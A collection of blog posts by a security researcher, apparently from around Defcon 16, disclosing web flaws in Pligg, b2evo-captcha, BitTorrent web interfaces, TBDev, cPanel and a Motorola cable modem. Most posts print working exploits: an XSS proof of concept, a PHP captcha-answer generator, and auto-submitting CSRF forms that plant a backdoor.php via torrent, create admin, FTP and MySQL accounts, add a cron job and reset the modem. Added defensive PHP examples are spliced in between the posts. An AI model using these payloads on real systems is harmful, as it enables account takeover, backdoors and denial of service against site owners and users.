Defcon 16

Thanks everyone for showing up to my two Defcon 16 talks. As a gift to Defcon I made available some hard-to-find code:

http://rooksecurity.com/goodiebag.zip

Best Wishes,

Michael

Pligg Auto-Voter Using XSS to Bypass CSRF Protection

Software Affected: Pligg 9.9.5

Download: http://forums.pligg.com/current-version/14301-pligg-beta-9-9-5-a.html

Exploit Code: http://rooksecurity.com/exploits/pligg_auto_voter.txt

Simple XSS PoC:

http://some_pligg/index.php?category=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Explanation:

Pligg suffers from a reflected cross-site scripting vulnerability in index.php, in the $_GET['category'] parameter. Exploit code was written that uses this flaw to bypass the CSRF protection and then vote on any Pligg article of the attacker's choosing.

This XSS vulnerability is made more serious when combined with my Captcha Implementation Bypass (http://www.rooksecurity.com/blog/?p=17), which allows an attacker to create new user accounts. With a new user account one can automatically add new Pligg links. The link could go to a page with the malicious iframe, forcing the user to vote on an article of the attacker's choosing. I took inspiration from the MySpace Samy worm, using XMLHttpRequest() to read the randomly generated token that protects requests from forgery. The exploit has been tested on Firefox 3 and IE7.

Pligg Captcha Implementation Bypass

Software Affected: Pligg 9.9.5

Download: http://forums.pligg.com/current-version/14301-pligg-beta-9-9-5-a.html

Explanation:

The latest version of Pligg suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for Pligg. The creation of new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19

The captcha's answer is generated the same way as in PHP-Nuke 8.1, which was broken here:

http://www.securityfocus.com/bid/27129/info

This attack is more serious when combined with the auto-voter exploit linked above, since the captcha bypass gives the attacker the new user accounts that exploit needs.

Again the captcha answer is produced using MD5, but the inputs differ. $_SERVER['HTTP_USER_AGENT'] and $ts_random are controlled by the attacker, $sitekey is a static value, and $datekey is known because it is based on the current date.

Exploit:

The link to the captcha image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear text, send that ts_random value to captcha_bypass.php from the same web browser (so the User-Agent matches):

http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

<?php
// Same inputs and formula as Pligg's ts_image.php, so the output is the
// captcha answer. Request it with the same browser (same User-Agent) and on
// the same day as the captcha image.
$sitekey = 82397834;                  // static value in the Pligg install
$ts_random = $_REQUEST['ts_random'];  // taken from the captcha image URL
$datekey = date("F j");               // e.g. "August 8"
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>

b2evo_captcha Implementation Bypass

Affected Software: b2evo-captcha, bigace 2.4, Online Ballot 1.0

Download:

http://voxel.dl.sourceforge.net/sourceforge/b2evo-captcha/b2evo-captcha-1.3.1.tar.gz

http://downloads.sourceforge.net/bigace/bigace_2.4.zip

http://downloads.sourceforge.net/onlineballot/online_ballot_1.0.zip

Explanation:

b2evo-captcha can be bypassed due to an implementation issue. The answer to this captcha is stored as an MD5 hash, much like a password. The MD5 hash is used to name the .jpeg file itself, so it is trivial to obtain. The hash is unsalted and can easily be broken using RainbowCrack or John the Ripper.

The answer for the captcha is generated by choosing 6 random characters from this list:
23456789?@#$%&*ABCDEFGHJKLMNPQRSTUVWXYZ

Example:

http://127.0.0.1/b2evo_captcha/b2evo_captcha_tmp/b2evo_captcha_8988d4408dc2db8880bab4ab7ee23780.jpg

8988d4408dc2db8880bab4ab7ee23780 = md5('$*L4Z6')
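As an added example (not code from Pligg or b2evo-captcha), here is a captcha implementation that has neither of the two weaknesses described in the Pligg and b2evo posts above: the answer comes from a CSPRNG instead of md5 over attacker-controlled and static inputs, and the answer is kept only in the server-side session while the image is addressed by an opaque random id, so no hash of the answer is ever exposed in a file name. The alphabet is the one listed above; the function names, the session layout and the captcha_image.php script name are assumptions.

```php
<?php
// Added example, not Pligg's or b2evo-captcha's code. Function names, the
// session layout and the captcha_image.php script name are assumptions.

const CAPTCHA_ALPHABET = '23456789?@#$%&*ABCDEFGHJKLMNPQRSTUVWXYZ'; // alphabet from the b2evo post
const CAPTCHA_LENGTH   = 6;
const CAPTCHA_TTL      = 300; // seconds a challenge stays valid

// Create a challenge. The answer is drawn from the CSPRNG (random_int), so
// nothing the client sends or can guess feeds into it; the challenge id is
// random too and unrelated to the answer, so the image URL reveals nothing.
function captcha_create(array &$session): string
{
    $answer = '';
    $max = strlen(CAPTCHA_ALPHABET) - 1;
    for ($i = 0; $i < CAPTCHA_LENGTH; $i++) {
        $answer .= CAPTCHA_ALPHABET[random_int(0, $max)];
    }
    $id = bin2hex(random_bytes(16));
    $session['captcha'][$id] = [
        'answer'  => $answer,
        'expires' => time() + CAPTCHA_TTL,
    ];
    return $id;
}

// Used by the image script to find out what to draw. Returns null for an
// unknown, malformed or expired id.
function captcha_lookup(array $session, string $id): ?string
{
    if (!preg_match('/^[0-9a-f]{32}$/', $id)) {
        return null;
    }
    $entry = $session['captcha'][$id] ?? null;
    if ($entry === null || $entry['expires'] < time()) {
        return null;
    }
    return $entry['answer'];
}

// Verify the user's response and consume the challenge, so a solved
// challenge cannot be replayed and a wrong guess does not get a second try.
function captcha_verify(array &$session, string $id, string $response): bool
{
    $answer = captcha_lookup($session, $id);
    unset($session['captcha'][$id]);
    if ($answer === null) {
        return false;
    }
    return hash_equals($answer, $response);
}

// Usage in the registration form handler:
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!captcha_verify($_SESSION, $_POST['captcha_id'] ?? '', $_POST['captcha'] ?? '')) {
        http_response_code(400);
        exit('captcha failed');
    }
    // ... create the account ...
}
$id = captcha_create($_SESSION);
?>
<form method="post">
    <img src="captcha_image.php?id=<?= $id ?>" alt="captcha">
    <input type="hidden" name="captcha_id" value="<?= $id ?>">
    <input type="text" name="captcha">
    <input type="submit" value="register">
</form>
```

The id is plain hex, which is why it can be echoed into the markup without encoding. The image script only needs captcha_lookup() to know what to draw; everything an automated registration script could read (the id, the image URL, the file name) is independent of the answer, which is the property both broken implementations lacked.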

PHP Memory Corruption

I found a memory corruption flaw in PHP. I did the responsible thing and reported it to the newly created oCERT. I am very excited about this new response team.

Check back; more information about this vulnerability will be provided. I am waiting until a patch is available.

Birthday

Today is my birthday and I am now 22 years old. Two years ago today I obtained remote code execution by exploiting a flaw I found. It was this exploit: Ultimate PHP Board

I made a number of flaws public today in celebration. My exploits have gotten more advanced in the past two years, but even two years ago I used exploit chaining. Today I'm building even more advanced chains, such as my CSRF Bounce attack against TBDev. My math has also gotten a lot better; I went from breaking a weak block cipher with algebra to breaking a hardened captcha with discrete math and fuzzy logic. In the past two years I have released a number of great exploits; you should check them out here: Milw0rm Exploits

Even two years ago I did not hide behind an alias. My name is Michael Brooks; I find flaws in software and I write exploit code.

Peace Out

BitTorrent Clients and CSRF

It is becoming increasingly common to have a web application interface for software that would normally be confined to the desktop. BitTorrent clients are a great example of this. A natural place to launch an attack on BitTorrent clients is a BitTorrent tracker site, as in my TBDev Bounce Attack.

It turns out all of the major web interfaces are vulnerable. The biggest problem with exploitation is that it is difficult for the attacker to know the exact location of the web interface. Even though remote code execution is possible, this is not a very serious vulnerability because it is difficult to exploit.

TorrentFlux v2.3 (latest)
http://sourceforge.net/projects/torrentflux/

<html>
<br>
If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</form>
</html>
<script>
document.getElementById('file_attack').submit();
</script>

<html>
Add an administrative account:
<form id='create_admin' method="post" action="http://localhost/torrentflux_2.3/html/admin.php?op=addUser">
<input type=hidden name="newUser" value="sadmin">
<input type=hidden name="pass1" value="password">
<input type=hidden name="pass2" value="password">
<input type=hidden name="userType" value=1>
<input type=submit value='create admin'>
</form>
</html>
<script>
document.getElementById('create_admin').submit();
</script>

uTorrent's WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
Force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

uTorrent: change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password has been changed, the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azureus's HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent

CSRF Bounce - TBDev

This is describing a real attack against:
TBDev

Exploit code
CSRF (http://www.owasp.org/index.php/Cross-Site_Request_Forgery) is often referred to as a sleeping giant. I think the giant is awake, but I'll let the reader decide by looking at my latest attacks. This attack uses CSRF in a chain with other flaws to obtain synergy; I call this CSRF Bouncing.
Security is difficult, and for many it is an impossible battle to keep their system from getting broken into. Some web application developers will choose their battles by trusting the administrative interface. If the administrator has access to tools like phpMyAdmin, then why secure the administrative interface from SQL injection? In the case of my TBDev exploit the developers did not harden the administrative interface against cross-site scripting attacks (http://www.owasp.org/index.php/Cross_Site_Scripting). Unfortunately this cross-site scripting attack is reachable by an attacker using a cross-site request forgery. The cross-site scripting flaw is particularly valuable: the XSS payload is stored in the main index.php of the application, which means an attacker can expose every visitor to their payload.
What makes it worse is that the application uses immortal session tokens. In fact the session ID is a salted MD5 hash of the person's password. This is an insecure cryptographic implementation. Make no mistake, salting your passwords does not make your system immune to a large rainbow table. After the password is cracked the clear text salt can be identified. However, the attacker does not have to break the password hash to authenticate with the application. This is a serious vulnerability in itself, and made even more serious by the persistent XSS flaw. It is shocking to me that people still use broken message digest functions to store their passwords. I'm not sure why developers think it's okay to introduce a nearly four-year-old vulnerability into their system. The SHA-2 family has withstood cryptanalysis, and it should be used to secure passwords.
The CSRF flaw is POST based, so it does require the administrator to execute JavaScript. Finding the administrator isn't difficult if you have a user account on the system. As with just about every SQL-powered application, the administrator is the first user account created, so the primary key will be 1. This URL will be the admin's profile on nearly every install of TBDev: http://localhost/userdetails.php?id=1
From this profile you will be able to send a personal message, and you may even be able to obtain the admin's email address.
If you don't have a user account you can use this reflected XSS flaw to obtain one:
http://localhost/redir.php?url=XSS
By using social engineering the attacker has a greater chance of the attack succeeding. In this case I am using the reflected XSS flaw to make it appear as though the administrator is viewing his own web application. The social engineering message could look something like this:
"I think there is a bug in your site. Can you check this link? It just does not look right: http://localhost/redir.php?url=' ." This now means the flaw is no longer a "cross-site" request forgery, because the request is being sent from the same website.
By having XSS on the front page it is possible to further attack the client. There are the usual MPack or XSS Shell attacks. However, I wrote CSRF attacks against three different BitTorrent clients.
After the attack has completed the website can be defaced, or every user's authentication token can be hijacked indefinitely. To remove the persistent XSS the administrator might have to log in to the SQL server manually and delete the offending entry in the "news" table. The difficult part is that every user will have to change their password. In PHP I suggest defending against XSS using htmlspecialchars($var, ENT_QUOTES); there are cases where XSS is still possible without ENT_QUOTES. To defend against CSRF I suggest using http://www.owasp.org/index.php/PHP_CSRF_Guard .
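The two mitigations just recommended, written out as an added example (not code from TBDev, Pligg or OWASP's CSRF Guard): output encoding with ENT_QUOTES, and a per-session synchronizer token on state-changing requests, with the session id regenerated at login so it is a fresh random value rather than something derived from the password. The same pattern is the fix for the Pligg auto-voter and the BitTorrent web interfaces above, with the caveat the Pligg post demonstrates: a CSRF token only holds if the page has no XSS, because script running in the page can read the token with XMLHttpRequest, so the encoding fix has to land first. The helper names and the form are assumptions.

```php
<?php
// Added example, not code from TBDev, Pligg or OWASP. Helper names and the
// form are assumptions; the two defenses are the ones recommended above.
session_start();

// --- CSRF: synchronizer token kept in the server-side session ---------------
// The token is random, never derived from the password or any client input,
// and compared in constant time.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// --- XSS: encode for HTML, including both quote characters ------------------
function encode_html(string $value): string
{
    // ENT_QUOTES encodes ' as well as ", so the result is safe inside a
    // single-quoted attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from
    // silently emptying the output.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input containing a single quote. With ENT_COMPAT (the default
// before PHP 8.1) the quote survives, so a value='...' attribute could be
// closed by it; with ENT_QUOTES it is encoded.
$category = "O'Brien";
echo htmlspecialchars($category, ENT_COMPAT), "\n"; // O'Brien
echo encode_html($category), "\n";                  // O&#039;Brien

// --- A state-changing POST handler using both --------------------------------
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    // On login, also call session_regenerate_id(true): the session id is
    // then a fresh random value from PHP, unrelated to the password hash,
    // and it dies with logout instead of living as long as the password.
    // ... perform the vote / admin action here ...
}
?>
<form method="post" action="">
    <input type="hidden" name="csrf_token" value="<?= encode_html(csrf_token()) ?>">
    <input type="text" name="category" value='<?= encode_html($category) ?>'>
    <input type="submit" value="vote">
</form>
```

The token check runs before any side effect and rejects a missing token as well as a wrong one. Note that the check does nothing for GET-driven actions such as the uTorrent and Azureus URLs above; those interfaces need the same token on every state-changing request, not only on POSTs.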

cPanel CSRF

cPanel has no protection against CSRF whatsoever. I picked out the attacks that I thought were the most serious. This is some of the most damaging CSRF possible.

Create database:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name
Create new MySQL user:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin

Add FTP user:
<html>
<form id=1 method='post' action='http://localhost:2082/frontend/x2/ftp/doaddftp.html'>
<input name='login' value='badmin'>
<input name='password' value='badmin'>
<input name='quota' value='unlimited'>
<input name='homedir' value='/badmin'>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

Or just cut to the chase and get a shell. This cron entry will run a command at minute 0 of every hour, every day.
<html>
<form id=2 method='post' action='http://localhost:2082/frontend/x2/cron/editcronsimple.html'>
<input name='command1' value='echo test'>
<input name='mailto' value='junk_address'>
<input name='minute1' value='0'>
<input name='hour1' value='*'>
<input name='day1' value='*'>
<input name='weekday1' value='*'>
<input name='month1' value='*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>

Sea-Surfing on the Motorola Surfboard

Motorola Surfboard cable modems suffer from two denial-of-service attacks by means of cross-site request forgery.

The latest version of the Motorola Surfboard is affected at the time of writing.

Software Version: SB5100-2.3.3.0-SCM00-NOSH
Hardware Version: 3
MIB Version: II
GUI Version: 1.0
VxWorks Version: 5.4

Restarts the modem:
<html>
<form id=1 method=post action='http://192.168.100.1/configdata.html'>
<input name='BUTTON_INPUT' value='Restart+Cable+Modem'>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

This CSRF will disconnect the user from the internet for longer.
"The process to get back online from a factory default condition could take from 5 to 30 minutes."
<html>
<form id=2 method=post action='http://192.168.100.1/configdata.html'>
<input name='BUTTON_INPUT' value='Reset+All+Defaults'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>